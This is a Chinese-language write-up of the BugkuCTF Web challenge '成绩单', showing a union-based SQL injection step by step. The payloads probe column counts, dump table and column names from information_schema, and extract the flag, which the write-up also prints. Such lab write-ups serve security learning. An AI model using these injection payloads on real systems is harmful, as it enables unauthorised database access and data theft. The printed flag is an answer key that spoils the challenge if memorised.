【BugkuCTF Web】成绩单

本文详细介绍了如何通过SQL注入攻击获取数据库信息的过程。首先,通过测试确定了查询系统回显字段的个数为4个,然后逐步获取了数据库的表名、字段名及具体的flag值。这一过程展示了SQL注入的基本原理和技术细节。

题目描述:

进入题目页面:

随便输入一点东西看看,输入1:

输入2:

初步判断这是一个查询系统,应该和SQL注入有关。

先看看回显字段个数,假设有4个回显字段,在查询框中输入语句:

1' order by 4#

正常回显:

将4改成5,再试试:

1' order by 5#

回显消失了,说明回显字段的个数是4个。

下面获取回显位置,构造语句:

-1' union select 1, 2, 3, 4#

从图中我们可以得知,表格中回显的位置是2,3,4。

选取一个位置,这里以第2个位置为例,开始获取数据库信息。

构造语句,获取表名:

-1' union select 1, group_concat(table_name), 3, 4 from information_schema.tables where table_schema=database()#

得到表名:fl4g、sc。

构造语句,查询fl4g表中的字段名:

-1' union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name='fl4g'#

得到字段名:skctf_flag。

构造语句,查询该表中skctf_flag字段的值:

-1' union select 1, skctf_flag, 3, 4 from fl4g#

得到flag:BUGKU{Sql_INJECT0N_4813drd8hz4}

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值